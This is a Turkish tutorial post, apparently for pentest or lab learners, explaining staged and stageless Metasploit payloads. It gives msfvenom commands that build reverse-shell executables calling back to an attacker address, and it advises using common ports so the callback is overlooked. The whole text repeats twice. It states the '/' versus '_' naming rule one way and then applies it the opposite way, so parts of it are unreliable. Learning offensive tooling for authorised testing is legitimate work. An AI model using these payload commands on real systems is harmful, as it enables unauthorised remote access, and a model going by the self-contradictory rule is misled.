- 12 Eyl 2023
- 79
- 30
En başta şunu bilmemiz gerekir payloadlar 2'ye ayrılır bunlar **Staged** ve **Stageless'dır** Stageless **Un Staged** olarakta bilinir.
Bunların farkını şöyle anlatayım:
**Staged:** Stage payloadı hedef sisteme 2 kere gider bu şu şekilde olur ilk gidişinde herhangi bir zararlı yazılım bulunmadan gider ve bu şekilde antivirüslere takılmaz buna **Stager** denir. Hedef sisteme ulaştıktan sonra stager bizim bilgisayarımıza bağlanır ve hedef sisteme enjekte eder. Böyle bir sistemi **ncat** ile malesef dinleyemeyiz dinlemeye çalıştığımız an bağlantımız kopucaktır bunun için **Metasploit'in** içinde bulunan **Multi Handler** adlı listener'ı kullanmamız gerekir.
**Stageless/Un Staged:** Bu payload ise tek parça halinde hedef sisteme gider çalışır ve bize shell açar fakat bu kadar basit olduğundan ötürü antivirüsler tarafından rahatlıkla yakalanır. Bu kadar basit oluşundan ötürü **ncat** veya **Multi Handler** ile dinlenebilir farketmez.
**Metasploit'in** içindeki payloadları görebilmek için `msfvenom --list payload` yazarız.
Burada listelenen payloadların **Staged** veya **Stageless** olduğunu anlamak için modüllerin yazına bakarız genelde orada gözükür fakat hepsinde değil örneğin:
![[Pasted image 20231008175644.png]]
Yanında yazmayan payloadların Staged veya Stageless olduğunu anlamak için **shell** den sonra / veya _ gelip gelmediğine bakarız; Eğerki / var ise bu bir **Stageless'dir**, _ var ise bu bir **Stagedir**
Not: `Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options` Komutu bize istenen parametreleri göstericektir.
Örnek bir payload:
`msfvenom -p PAYLOAD/shell_xxx LHOST=10.10.10.10 LPORT=80 -f exe -o benBirShellim.exe`
Şimdi Burayı açıklayalım:
- -p 'den sonra PAYLOAD ismi gelir payloadlara bakmak için `msfvenom --list payload` yazarız.
- LHOST'a kendi ip adresimiz LPORT'a ise cihazımızda bulunan boş bir portu gireriz. Unutmayın 80,22,20 gibi portlar genelde açık bırakılır ve buralar görmezden gelinir bu yüzden sık kullanılan ve açık bırakılan portları girmek daha faydalı olcucaktır. (Unutma bunlar bir parametre istenenler değişiklik gösterebilir bu sadece bir örnek)
- -f ise format anlamına gelir, formatları görüntülemek için `msfvenom --list formats` komutunu kullanabilirsiniz
- Son olarak -o çıktı dosyamızdır isim ve formatı girip bitirebiliriz.
Peki bir soru bu payload Staged'mi yoksa Stagess midir?
- Evet bu bir Stagess'dir çünkü shell'den sonra _ koyulmuş.
Bir soru daha bu payload **ncat** ile dinlenebilir mi?
- Evet çünkü bu bir Stagess'dir.
Bir örnek payload daha:
`msfvenom -p PAYLOAD/shell/xxx LHOST=10.10.10.10 LPORT=80 -f exe -o benBirShellim.exe`
Burayı uzun uzun açıklamaya gerek yok arada 2 fark var:
- Gördüğünüz gibi bu bir Staged çünkü shell'den sonra / gelmiş.
- 2. olarak bu payload ncat ile dinlenilmez dinlenir ise bağlantı başlar başlamaz kopar bu yüzden burada kullanacağımız dinleme **Multi Handler'dır**
Bunların farkını şöyle anlatayım:
**Staged:** Stage payloadı hedef sisteme 2 kere gider bu şu şekilde olur ilk gidişinde herhangi bir zararlı yazılım bulunmadan gider ve bu şekilde antivirüslere takılmaz buna **Stager** denir. Hedef sisteme ulaştıktan sonra stager bizim bilgisayarımıza bağlanır ve hedef sisteme enjekte eder. Böyle bir sistemi **ncat** ile malesef dinleyemeyiz dinlemeye çalıştığımız an bağlantımız kopucaktır bunun için **Metasploit'in** içinde bulunan **Multi Handler** adlı listener'ı kullanmamız gerekir.
**Stageless/Un Staged:** Bu payload ise tek parça halinde hedef sisteme gider çalışır ve bize shell açar fakat bu kadar basit olduğundan ötürü antivirüsler tarafından rahatlıkla yakalanır. Bu kadar basit oluşundan ötürü **ncat** veya **Multi Handler** ile dinlenebilir farketmez.
**Metasploit'in** içindeki payloadları görebilmek için `msfvenom --list payload` yazarız.
Burada listelenen payloadların **Staged** veya **Stageless** olduğunu anlamak için modüllerin yazına bakarız genelde orada gözükür fakat hepsinde değil örneğin:
![[Pasted image 20231008175644.png]]
Yanında yazmayan payloadların Staged veya Stageless olduğunu anlamak için **shell** den sonra / veya _ gelip gelmediğine bakarız; Eğerki / var ise bu bir **Stageless'dir**, _ var ise bu bir **Stagedir**
Not: `Msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options` Komutu bize istenen parametreleri göstericektir.
Örnek bir payload:
`msfvenom -p PAYLOAD/shell_xxx LHOST=10.10.10.10 LPORT=80 -f exe -o benBirShellim.exe`
Şimdi Burayı açıklayalım:
- -p 'den sonra PAYLOAD ismi gelir payloadlara bakmak için `msfvenom --list payload` yazarız.
- LHOST'a kendi ip adresimiz LPORT'a ise cihazımızda bulunan boş bir portu gireriz. Unutmayın 80,22,20 gibi portlar genelde açık bırakılır ve buralar görmezden gelinir bu yüzden sık kullanılan ve açık bırakılan portları girmek daha faydalı olcucaktır. (Unutma bunlar bir parametre istenenler değişiklik gösterebilir bu sadece bir örnek)
- -f ise format anlamına gelir, formatları görüntülemek için `msfvenom --list formats` komutunu kullanabilirsiniz
- Son olarak -o çıktı dosyamızdır isim ve formatı girip bitirebiliriz.
Peki bir soru bu payload Staged'mi yoksa Stagess midir?
- Evet bu bir Stagess'dir çünkü shell'den sonra _ koyulmuş.
Bir soru daha bu payload **ncat** ile dinlenebilir mi?
- Evet çünkü bu bir Stagess'dir.
Bir örnek payload daha:
`msfvenom -p PAYLOAD/shell/xxx LHOST=10.10.10.10 LPORT=80 -f exe -o benBirShellim.exe`
Burayı uzun uzun açıklamaya gerek yok arada 2 fark var:
- Gördüğünüz gibi bu bir Staged çünkü shell'den sonra / gelmiş.
- 2. olarak bu payload ncat ile dinlenilmez dinlenir ise bağlantı başlar başlamaz kopar bu yüzden burada kullanacağımız dinleme **Multi Handler'dır**
